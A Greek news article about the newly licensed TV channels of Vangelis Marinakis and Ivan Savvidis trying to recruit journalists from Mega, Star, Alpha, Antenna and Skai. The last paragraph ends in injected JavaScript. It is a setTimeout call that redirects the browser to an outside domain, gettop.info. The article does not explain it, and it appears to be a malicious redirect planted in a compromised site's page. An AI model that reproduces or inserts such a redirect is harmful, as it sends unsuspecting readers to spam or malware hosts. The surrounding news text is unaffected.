Στο σκόπευτρο Μαρινάκη-Σαββίδη πρόσωπα-έκπληξη από Αντέννα και Σκάι

0
10

Με γρήγορους ρυθμούς κινείται το επιτελείο του Βαγγέλη Μαρινάκη, στην προσπάθεια να στελεχώσει το νέο τηλεοπτικό σταθμό του, με βραδύτερους οι συνεργάτες του Ιβάν Σαββίδη για το δικό του τηλεοπτικό εγχείρημα, ενώ κινητικότητα εμφανίζεται και στα κανάλια που δεν κέρδισαν άδεια (Alpha, Star) και στο Mega που δεν έλαβε καν μέρος στον διαγωνισμό και σε εκείνα που εξασφάλισαν τη συνέχειά τους (Αντέννα, Σκάι).

Οι υπό σύσταση σταθμοί, όπως είναι φυσικό, θέλουν να εντάξουν στο δυναμικό τους έμπειρα και δημοφιλή πρόσωπα και από το Mega και από το Star και από τον Alpha –παρότι η οικογένεια Βαρδινογιάννη και ο Δημήτρης Κοντομηνάς επιμένουν ότι οι τηλεοπτικές τους επιχειρήσεις θα βρουν τρόπο να παραμείνουν στον «αέρα». Ήδη έχουν αρχίσει διερευνητικές συζητήσεις με κάποιους-ες, που λογικό είναι να ανησυχούν για το επαγγελματικό τους αύριο, και σύντομα θα υπάρξουν ανακοινώσεις.

Αξιοσημείωτο είναι, πάντως, ότι σκέφτονται να «χτυπήσουν» και πρόσωπα από τον Αντέννα και τον Σκάι. Πηροφορίες αναφέρουν ότι στο σκόπευτρο βρίσκονται σημαντικά στελέχη του ενημερωτικού τομέα των δυο σταθμών. Σε μια περίπτωση, μάλιστα, η συζήτηση αφορά σε εξαιρετικά προβεβλημένο δημοσιογράφο. Αν γίνει δε πραγματικότητα η μετακίνησή του, αναμένεται να υπάρξει ντόμινο αλλαγών… setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here